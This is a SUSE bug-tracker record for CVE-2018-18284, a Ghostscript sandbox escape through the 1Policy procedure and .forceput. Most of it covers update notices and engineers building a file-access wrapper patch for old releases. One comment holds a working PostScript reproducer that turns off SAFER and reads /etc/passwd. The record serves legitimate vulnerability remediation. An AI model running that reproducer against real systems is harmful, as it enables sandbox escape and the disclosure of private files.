Bug 1112229 - (CVE-2018-18284) VUL-0: CVE-2018-18284: ghostscript,ghostscript-library: 1Policy operator gives access to .forceput
(CVE-2018-18284)
VUL-0: CVE-2018-18284: ghostscript,ghostscript-library: 1Policy operator give...
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
unspecified
Other Other
: P3 - Medium : Major
: ---
Assigned To: Security Team bot
Security Team bot
https://smash.suse.de/issue/216693/
CVSSv3:SUSE:CVE-2018-18284:8.1:(AV:N...
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2018-10-17 15:49 UTC by Robert Frohl
Modified: 2020-06-16 22:09 UTC (History)
13 users (show)

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments
ghostscript-wrapper.patch --- initial patch (5.71 KB, text/plain)
2019-07-22 11:22 UTC, Dr. Werner Fink
Details
ghostscript-wrapper.patch --- final patch (12.19 KB, text/plain)
2019-07-23 13:12 UTC, Dr. Werner Fink
Details
ghostscript-wrapper.patch --- final patch (13.03 KB, text/plain)
2019-07-23 14:24 UTC, Dr. Werner Fink
Details
ghostscript-wrapper.patch --- finishing (13.18 KB, text/plain)
2019-07-24 06:26 UTC, Dr. Werner Fink
Details
ghostscript-wrapper.patch -- more polishing, that is let HOME dir code work (14.95 KB, text/plain)
2019-07-24 09:26 UTC, Dr. Werner Fink
Details
ghostscript-wrapper.patch -- forbid execvp(3) as well (16.09 KB, text/plain)
2019-07-24 12:34 UTC, Dr. Werner Fink
Details
ghostscript-wrapper.patch -- forbid (always) popen(3) instead if -dSAFER is set (16.35 KB, text/plain)
2019-07-24 14:09 UTC, Dr. Werner Fink
Details
ghostscript-wrapper.patch -- forbid (always) popen(3) instead if -dSAFER is set (18.74 KB, text/plain)
2019-07-25 08:06 UTC, Dr. Werner Fink
Details
ghostscript-wrapper.patch -- forbid (always) popen(3) instead if -dSAFER is set (20.26 KB, patch)
2019-07-25 10:51 UTC, Dr. Werner Fink
Details | Diff
blktrace.log (317.61 KB, text/plain)
2019-07-25 11:26 UTC, Dr. Werner Fink
Details
ghostscript-wrapper.patch -- forbid (always) popen(3) instead if -dSAFER is set (22.05 KB, text/plain)
2019-07-26 07:47 UTC, Dr. Werner Fink
Details
ghostscript-wrapper.patch -- now with readme above the patch (24.48 KB, text/plain)
2019-07-26 11:36 UTC, Dr. Werner Fink
Details

Note You need to log in before you can comment on or make changes to this bug.
Description Robert Frohl 2018-10-17 15:49:30 UTC
CVE-2018-18284, another ghostscript sandbox escape. Because procedures
in postscript are just executable arrays, all system procedures need to be
marked as executeonly, so that users cannot peek at their internals with
array operators.

We have also recently learned that they must be marked as pseudo-operators,
otherwise their contents might leak to error handlers.

That makes sense, unless the procedure itself is dangerous - in that case
it must be hidden.

1Policy is a procedure that was correctly marked as executeonly and made a
pseudo-operator, but was basically just a wrapper around .forceput.

patch:
http://git.ghostscript.com/?p=ghostpdl.git;h=8d19fdf63f91f50466b08f23e2d93d37a4c5ea0b

References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18284
http://seclists.org/oss-sec/2018/q4/56
http://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-18284.html
Comment 1 Robert Frohl 2018-10-17 15:52:35 UTC
Hi Johannes,
from a initial code review these codestreams are affected:
- SUSE:SLE-15:Update/ghostscript 
- SUSE:SLE-12:Update/ghostscript 
- SUSE:SLE-11-SP1:Update/ghostscript-library 
- SUSE:SLE-10-SP3:Update/ghostscript-library
Comment 11 Swamp Workflow Management 2018-12-12 17:10:13 UTC
SUSE-SU-2018:4087-1: An update that solves 8 vulnerabilities and has one errata is now available.

Category: security (important)
Bug References: 1109105,1111479,1111480,1112229,1117022,1117274,1117313,1117327,1117331
CVE References: CVE-2018-17183,CVE-2018-17961,CVE-2018-18073,CVE-2018-18284,CVE-2018-19409,CVE-2018-19475,CVE-2018-19476,CVE-2018-19477
Sources used:
SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (src):    ghostscript-mini-9.26-3.9.3
SUSE Linux Enterprise Module for Desktop Applications 15 (src):    libspectre-0.2.8-3.4.3
SUSE Linux Enterprise Module for Basesystem 15 (src):    ghostscript-9.26-3.9.4
Comment 12 Swamp Workflow Management 2018-12-12 20:11:34 UTC
SUSE-SU-2018:4090-1: An update that solves 8 vulnerabilities and has one errata is now available.

Category: security (important)
Bug References: 1109105,1111479,1111480,1112229,1117022,1117274,1117313,1117327,1117331
CVE References: CVE-2018-17183,CVE-2018-17961,CVE-2018-18073,CVE-2018-18284,CVE-2018-19409,CVE-2018-19475,CVE-2018-19476,CVE-2018-19477
Sources used:
SUSE OpenStack Cloud 7 (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Software Development Kit 12-SP4 (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Software Development Kit 12-SP3 (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Server for SAP 12-SP2 (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Server 12-SP4 (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Server 12-SP3 (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Server 12-SP2-LTSS (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Server 12-SP2-BCL (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Server 12-SP1-LTSS (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Server 12-LTSS (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Desktop 12-SP4 (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Linux Enterprise Desktop 12-SP3 (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
SUSE Enterprise Storage 4 (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1
Comment 13 Swamp Workflow Management 2018-12-15 11:11:31 UTC
openSUSE-SU-2018:4138-1: An update that solves 8 vulnerabilities and has one errata is now available.

Category: security (important)
Bug References: 1109105,1111479,1111480,1112229,1117022,1117274,1117313,1117327,1117331
CVE References: CVE-2018-17183,CVE-2018-17961,CVE-2018-18073,CVE-2018-18284,CVE-2018-19409,CVE-2018-19475,CVE-2018-19476,CVE-2018-19477
Sources used:
openSUSE Leap 15.0 (src):    ghostscript-9.26-lp150.2.9.1, ghostscript-mini-9.26-lp150.2.9.1, libspectre-0.2.8-lp150.2.6.2
Comment 14 Swamp Workflow Management 2018-12-15 11:14:57 UTC
openSUSE-SU-2018:4140-1: An update that solves 8 vulnerabilities and has one errata is now available.

Category: security (important)
Bug References: 1109105,1111479,1111480,1112229,1117022,1117274,1117313,1117327,1117331
CVE References: CVE-2018-17183,CVE-2018-17961,CVE-2018-18073,CVE-2018-18284,CVE-2018-19409,CVE-2018-19475,CVE-2018-19476,CVE-2018-19477
Sources used:
openSUSE Leap 42.3 (src):    ghostscript-9.26-14.12.1, ghostscript-mini-9.26-14.12.1, libspectre-0.2.7-17.4.2
Comment 15 Swamp Workflow Management 2019-04-27 22:38:40 UTC
SUSE-SU-2018:4090-2: An update that solves 8 vulnerabilities and has one errata is now available.

Category: security (important)
Bug References: 1109105,1111479,1111480,1112229,1117022,1117274,1117313,1117327,1117331
CVE References: CVE-2018-17183,CVE-2018-17961,CVE-2018-18073,CVE-2018-18284,CVE-2018-19409,CVE-2018-19475,CVE-2018-19476,CVE-2018-19477
Sources used:
SUSE Linux Enterprise Server for SAP 12-SP1 (src):    ghostscript-9.26-23.16.1, libspectre-0.2.7-12.4.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 16 Alexandros Toptsoglou 2019-05-14 14:41:48 UTC
Reproducer tested in SLE11 

$ gs -dSAFER -sDEVICE=ppmraw
GPL Ghostscript 9.25 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
GS>/.forceput { <<>> <<>> 4 index (ignored) 5 index 5 index .policyprocs 1
get exec pop pop pop pop pop pop pop } def
GS>systemdict /SAFER false .forceput
GS>systemdict /userparams get /PermitFileControl [(*)] .forceput
GS>systemdict /userparams get /PermitFileWriting [(*)] .forceput
GS>systemdict /userparams get /PermitFileReading [(*)] .forceput
GS>(/etc/passwd) (r) file 1024 string readline pop ==
(root:x:0:0:root:/root:/bin/bash)
GS>
Comment 34 Johannes Segitz 2019-07-17 13:34:23 UTC
I've had a look at the wrapper. It's a similar approach I took when I confined quilt with nsjail (https://github.com/jsegitz/squilt). While I think that it's great to have something like this (thank you Werner) we still have the problem that it only protects the use cases that use the wrapper. Since the wrapper doesn't work in all situations we can ship it as a drop in replacement. 

AA has the advantage, that it can confine binaries without their cooperation, but there we quickly found that we either have a very limited effect or it breaks use cases.
Comment 37 Dr. Werner Fink 2019-07-17 13:47:50 UTC
(In reply to Johannes Segitz from comment #34)
> I've had a look at the wrapper. It's a similar approach I took when I
> confined quilt with nsjail (https://github.com/jsegitz/squilt). While I
> think that it's great to have something like this (thank you Werner) we
> still have the problem that it only protects the use cases that use the
> wrapper. Since the wrapper doesn't work in all situations we can ship it as
> a drop in replacement. 
> 
> AA has the advantage, that it can confine binaries without their
> cooperation, but there we quickly found that we either have a very limited
> effect or it breaks use cases.

At last but not least printing as well as tools like gv do work ... only on SLE11-SP3/4 the bwrap utility has to be suid root as otherwise normal users are not allowed to do anything.

I've tried several devices including no one (default X11) as well as x11alpha ... what does not work are %pipe% as well as X11 DISPLAY over ssh or remote network.
Comment 44 Dr. Werner Fink 2019-07-22 11:22:30 UTC
Created attachment 811175 [details]
ghostscript-wrapper.patch --- initial patch

Here we go ... any opinion on this approach?

(In reply to Dr. Werner Fink from comment #42)
>  nm -D /usr/lib64/libgs.so.8.62 | grep -E ' U .*open'
>                  U dlopen
>                  U fdopen
>                  U fopen
>                  U fopen64
>                  U freopen
>                  U iconv_open
>                  U open
>                  U opendir
>                  U popen
> 
> 
> ... if we overload (at compile or link time) the functions
> fopen/fopen64/freopen/open/opendir with replacements which uses a whitelist
> of directories and files which are allowd to be read and maybe as well as
> the file specified to be written we could then forbid all other cases.  OK
> this will cause trouble and some big reports but this seem to be the poor
> man's container even on SLES 10.
> 
> Don't know if this works, overloading libraries was a method I used some
> years back with Netscape closed binary, but as we have the source in GPLv2
> it could be also done by redefining the standard stdio.h//fcntl.h functions
> ... also with fopencookie(3) there is a way to impelement a filter within
> stdio ... for open only the redefining would help.
Comment 45 Dr. Werner Fink 2019-07-23 13:12:13 UTC
Created attachment 811319 [details]
ghostscript-wrapper.patch --- final patch

Any comments? Please speak up even if the code is clear!
Comment 46 Dr. Werner Fink 2019-07-23 14:24:28 UTC
Created attachment 811333 [details]
ghostscript-wrapper.patch --- final patch

Added stat(2) system call to check file type if any
Comment 47 Dr. Werner Fink 2019-07-24 06:26:52 UTC
Created attachment 811387 [details]
ghostscript-wrapper.patch --- finishing

Simplify opendir access by using O_DIRECTORY
Comment 48 Dr. Werner Fink 2019-07-24 09:26:48 UTC
Created attachment 811414 [details]
ghostscript-wrapper.patch -- more polishing, that is let HOME dir code work

Now the patch uses a file /etc/ghostscript/forbidden which may include more than the sub directories .ssh and .gnupg below $HOME ... note that $HOME should ve included in this file
Comment 49 Johannes Segitz 2019-07-24 11:20:00 UTC
(In reply to Dr. Werner Fink from comment #48)
I'm just going through the patch. I think it's a rather elegant solution to the problem. This of course has some limitations (e.g. some scenarios will not work and it doesn't protect against exploits that bring shellcode that doesn't go through the hooked functions. It might make sense to look at seccomp/other containment mechanism in a second step to harden against this.

I'll continue to play around with this. One first thing I spotted: You leak memory by not freeing path 
+    path = realpath(dir, NULL);
this is never freed.
Comment 50 Dr. Werner Fink 2019-07-24 11:27:40 UTC
(In reply to Johannes Segitz from comment #49)

> I'll continue to play around with this. One first thing I spotted: You leak
> memory by not freeing path 
> +    path = realpath(dir, NULL);
> this is never freed.

It is freed by the defined qualifier cleanup_q

 static inline void freep(void *p) { free(*(void**) p); }
 #define cleanup_q __attribute__ ((__cleanup__ (freep)))
Comment 51 Dr. Werner Fink 2019-07-24 11:32:46 UTC
(In reply to Johannes Segitz from comment #49)
> (In reply to Dr. Werner Fink from comment #48)
> I'm just going through the patch. I think it's a rather elegant solution to
> the problem. This of course has some limitations (e.g. some scenarios will
> not work and it doesn't protect against exploits that bring shellcode that
> doesn't go through the hooked functions. It might make sense to look at
> seccomp/other containment mechanism in a second step to harden against this.

Hmmm ... shell code, we could overload system() as well but I do not see where libgs does include this libc call? I see execvp() and we can also overload this function as well.
Comment 52 Dr. Werner Fink 2019-07-24 11:39:08 UTC
(In reply to Dr. Werner Fink from comment #50)
> (In reply to Johannes Segitz from comment #49)
> 
> > I'll continue to play around with this. One first thing I spotted: You leak
> > memory by not freeing path 
> > +    path = realpath(dir, NULL);
> > this is never freed.
> 
> It is freed by the defined qualifier cleanup_q
> 
>  static inline void freep(void *p) { free(*(void**) p); }
>  #define cleanup_q __attribute__ ((__cleanup__ (freep)))

You see this if you free() path at the end without setting it to NULL as you then catch a SIGSEGV due double free() ;)
Comment 53 Dr. Werner Fink 2019-07-24 12:24:38 UTC
I see the execvp is in ijs/ijs_exec_server.c ... currently I have

 #if !defined(PACKAGE_NAME)
 extern int  _gswrap_execvp(const char *, char *const []);
 extern inline __attribute__ ((__gnu_inline__)) int execvp(const char *file, char *const argv[])
 {
     return _gswrap_execvp(file, argv);
 }
 #endif

in ijs/unistd_.h that is that the execvp() wioll be wrapped in libgs but not in libijs ... the libijs is for hpijs (the HP IJS server for the Ghostscript IJS client driver) ... the question is if we should forbid execvp in libijs as well or if wethen break the HP printing IJS client driver
Comment 54 Dr. Werner Fink 2019-07-24 12:34:31 UTC
Created attachment 811446 [details]
ghostscript-wrapper.patch -- forbid execvp(3) as well

Only if the file /etc/ghostscript/unsecure exists execvp(3) is allowed
Comment 58 Johannes Segitz 2019-07-24 13:37:26 UTC
(In reply to Dr. Werner Fink from comment #50)
of course, sorry for the noise, I noticed that during a first reading of the patch, didn't check the declaration properly
Comment 59 Dr. Werner Fink 2019-07-24 14:09:42 UTC
Created attachment 811452 [details]
ghostscript-wrapper.patch -- forbid (always) popen(3) instead if -dSAFER is set

Skipped the execvp(3) overload and now overload popen(3) ... for this I remember if the -dSAFER had been set on the command line and if so the popen(3) is not executed at all even if devil PostScript code enables this API.
Comment 60 Dr. Werner Fink 2019-07-25 08:06:21 UTC
Created attachment 811528 [details]
ghostscript-wrapper.patch -- forbid (always) popen(3) instead if -dSAFER is set

Now forbid if %pipe% is not used on command line witj -dSAFER but elsewhere, also forbid deletefile and renamefile operator if -dSAFER is set.  Add sanity check for the OutputFile(s) specified on the command line
Comment 61 Dr. Werner Fink 2019-07-25 10:51:20 UTC
Created attachment 811574 [details]
ghostscript-wrapper.patch -- forbid (always) popen(3) instead if -dSAFER is set

Latest version now prints also (pdf|ps|ps2|eps)write as thise devices want to have RWRD instead or WRONLY output files.

I've only three errors with three pdf files and cups as device

 Finished testing nullpage cups epson deskjet ljet4 pxlmono pxlcolor pdfwrite ps2write jpeg pngalpha pnggray pngmono
 Build FAILURE because gs failed for those drivers and example_files:
 FAILURE for cups with /usr/share/doc/packages/blktrace/blktrace.pdf
 FAILURE for cups with /usr/share/doc/packages/scout/scout.pdf
 FAILURE for cups with /usr/share/doc/packages/yast2-instserver/network-install.pdf

no idea what goes wrong here?
Comment 62 Dr. Werner Fink 2019-07-25 11:06:32 UTC
This is what I see ... Last OS error 2 is ENOENT (No such file or directory)

Error: /rangecheck in .installpagedevice
Operand stack:
   --nostringval--   --nostringval--   --dict:107/126(ro)(L)--   --nostringval--
Execution stack:
   %interp_exit   .runexec2   --nostringval--   --nostringval--   --nostringval--   2   %stopped_push   --nostringval--   --nostringval--   --nostringval--   false   1   %stopped_push   1921   1   3   %oparray_pop   1
920   1   3   %oparray_pop   1904   1   3   %oparray_pop   --nostringval--   --nostringval--   1850   2   4   %oparray_pop   --nostringval--   1834   2   4   %oparray_pop   --nostringval--   --nostringval--
Dictionary stack:
   --dict:1170/3371(ro)(G)--   --dict:1/20(G)--   --dict:70/200(L)--   --dict:70/200(L)--
Current allocation mode is local
Last OS error: 2
GPL Ghostscript 8.62: Unrecoverable error, exit code 1
DEBUG2: cups_close(0x1aa6278)
Comment 63 Dr. Werner Fink 2019-07-25 11:13:24 UTC
Looks like cups device is looking for Halftone/Default below all accessible directories ... ???
Comment 64 Dr. Werner Fink 2019-07-25 11:26:04 UTC
Created attachment 811579 [details]
blktrace.log

The result of

gs -q -r50 -dNOPAUSE -dBATCH -sOutputFile=/dev/null -sDEVICE=cups blktrace.pdf
Comment 65 Dr. Werner Fink 2019-07-25 11:50:54 UTC
AFAICS ghostscript opens the device 

open("/dev/null", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 4


and wites with success ... but then it thries to do a 20th page which is not there ... on Tumblwweed this works up page 19 but no page 20 is mentioned

fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 1), ...}) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ff57beab000
write(1, "Error: /rangecheck", 18Error: /rangecheck)      = 18
write(1, " in .installpagedevice", 22 in .installpagedevice)  = 22

... fd 1 is the terminal aka stdout
Comment 66 Dr. Werner Fink 2019-07-25 15:38:22 UTC
also it looks like there is a routine which open Cmap directory as regular file but allowing this makes no difference ... next is to compile the stuff with my patch disabled
Comment 67 Dr. Werner Fink 2019-07-25 15:42:49 UTC
The cusp device crashes also without my patch on those three files!
Comment 68 Johannes Segitz 2019-07-26 07:06:44 UTC
I played with the wrapper a bit and think with the limits on popen this is a good approach. Since these files you found aren't a regression I would vote for sending this to QA for a test while you're away. 

Long term we'll have to monitor the exploits that come out for ghostscript and check if something is missing here that we can add without breakage.
Comment 69 Dr. Werner Fink 2019-07-26 07:47:06 UTC
Created attachment 811712 [details]
ghostscript-wrapper.patch -- forbid (always) popen(3) instead if -dSAFER is set

(In reply to Johannes Segitz from comment #68)
> I played with the wrapper a bit and think with the limits on popen this is a
> good approach. Since these files you found aren't a regression I would vote
> for sending this to QA for a test while you're away. 
> 
> Long term we'll have to monitor the exploits that come out for ghostscript
> and check if something is missing here that we can add without breakage.

Yep ... just harden it a bit, that is now I enforce SAFER exactly at the point where the system PostScript init files are done. Also allow O_WRONLY for pdfwrite and Co. device drivers as otherwise various scripts like pdf2ps might fail.

With the new remember_init() all PostScript code later seen might include foreign code ... beside layout like landscape.ps and fonts from the system.  The command line of pdf2ps looks like

gs q -dNOPAUSE -dBATCH -P- -dSAFER -sDEVICE=ps2write -sOutputFile=<out>.ps -c save pop -f <in>.pdf

and here not O_RDWR but O_WRONLY is used as I had tested
Comment 70 Dr. Werner Fink 2019-07-26 11:36:24 UTC
Created attachment 811755 [details]
ghostscript-wrapper.patch -- now with readme above the patch

<cite>
From: Werner Fink <werner@suse.de>
Date: Fri, 26 Jul 2019 12:54:12 +0200
Subject: Workaround various attack vectors in ghostscript of regaining permissions

First note: This patch does NOT port the real upstream fixes done for ghostscript 9.27
below its License AGPLv3 (GNU Affero General Public License) back to ghostscript 8.62
below GPLv2 (GNU General Public License) as such ports can not be distributed with
the GPLv2 anymore.

This patch is a workaround which uses the libc API functions opendir(3), open64(2),
open(2), fopen64(3), fopen(3), and popen(3) to enwrap those API functions with
enhanced checks.  Those checks include file locations to allow or forbid reading
and/or writting those files.  To make this work with the ghostscript option -dSAFER
the program options in the array of argument strings passed to e.g. ghostscript
in the API libgs function gs_main_init_with_args() and also after the main
initialing PostScript[tm] files are executed by the ghostscript command interpreter
within the API libgs function gs_run_init_file().

This allows that the interfaces %pipe% as well as the "deletefile" and "renamefile"
operators can not be used or modified with the ghostscript option -dSAFER.

The read permission for files are only given below the official localizations

       /etc/fonts
       /etc/ghostscript
       /usr/lib/ghostscript
       /usr/lib64/ghostscript
       /usr/share/ghostscript
       /usr/share/fonts
       /var/cache/fontconfig

as well as in the paths specified in the environment variables

       GS_LIB_DEFAULT
       GS_LIB
       GS_FONTPATH

which implies that below those specified paths no confidential data should
be stored.  Beside this there are confidential sub directories below the users
$HOME directory:

      .ssh
      .gnupg

which are not accessible anymore.  On need the system adminstrator can specify
more sub directories without any leading $HOME prefix in the configuration file

      /etc/ghostscript/forbidden

One last step further is that ghostscipt can only write to the following special
device files

      /dev/null
      /dev/zero
      /dev/lp*      where * means /dev/lp0, /dev/lp1, ...
      /dev/usb/lp*  where * means /dev/usb/lp0, /dev/usb/lp1, ...

In should be noted, that all paths for the file locations are expanded by the
libc API function realpath(3) therefore even symbolic links are expanded to
the real location.  This means, e.g. that links below the official localizations
can not read.
</cite>
Comment 71 Enzo Matsumiya 2019-08-08 16:54:32 UTC
Hi. Any preliminary results testing this wrapper?
Comment 72 Dr. Werner Fink 2019-08-13 06:34:04 UTC
(In reply to Enzo Matsumiya from comment #71)
> Hi. Any preliminary results testing this wrapper?

I've no information as I was two weeks on vacation.  Johannes from the security team might have tested it out meanwhile.

My own test two weeks had shown that open files not belonging to ghostscript not fonts is not possible from an attacking PostScript code even with reenabled and/or misused system operator for opening files simply because the underlying C routines from libgs do not allow such access anymore.  Also open new pipes are also forbidden in the C routines of libgs.
Comment 73 Johannes Segitz 2019-08-13 06:39:38 UTC
I looked at it from a security POV (and didn't see functionality issues, but I didn't try to provoke them). I would suggest that you submit this and we put it in an incident and have QA do an intensive test on this. Bringing in Alex as he's the current UM
Comment 74 Dr. Werner Fink 2019-08-13 12:14:14 UTC
(In reply to Johannes Segitz from comment #73)
> I looked at it from a security POV (and didn't see functionality issues, but
> I didn't try to provoke them). I would suggest that you submit this and we
> put it in an incident and have QA do an intensive test on this. Bringing in
> Alex as he's the current UM

See SR#198756 ... this one does fix MORE than this bug! Also the tester should be aware that the patch ghostscript-wrapper.patch does NOT fix the interpreter, that is it does e.g. NOT forbid the access to .forceput operator. INdeed backporting those fixes would violate the APGLv3 license conditions.

This patch DOES catch any misused operator later if it is used to a) open files from within a Postscript file which are not fonts or ghostscript initial Postscript files and b) does not allow that the %pipe% macro is rewritten nor set.
Comment 75 Dr. Werner Fink 2019-08-13 12:20:28 UTC
(In reply to Dr. Werner Fink from comment #74)
> (In reply to Johannes Segitz from comment #73)
> > I looked at it from a security POV (and didn't see functionality issues, but
> > I didn't try to provoke them). I would suggest that you submit this and we
> > put it in an incident and have QA do an intensive test on this. Bringing in
> > Alex as he's the current UM
> 
> See SR#198756 ... this one does fix MORE than this bug! Also the tester
[...]
SR#198757 ... that is remove doubled change set of src/imain.c
Comment 76 Dr. Werner Fink 2019-08-26 12:12:25 UTC
Are ther any news, that is like is there a methode with -dSAFER to misuse the accessible PostScript operators like .forceput to e.g. read files which should not be readable?  Or is it possible to set or overwite the %pipe% tag?
Comment 77 Dr. Werner Fink 2019-09-16 11:34:17 UTC
Part of gs 9.27
Comment 78 Dr. Werner Fink 2019-09-17 10:25:55 UTC
Alexander? Do you have any news?
Comment 85 Marcus Meissner 2020-01-28 07:23:20 UTC
solved for SLE11 with the wrapper, SLE12 and SLE15 fixed by version upadtes.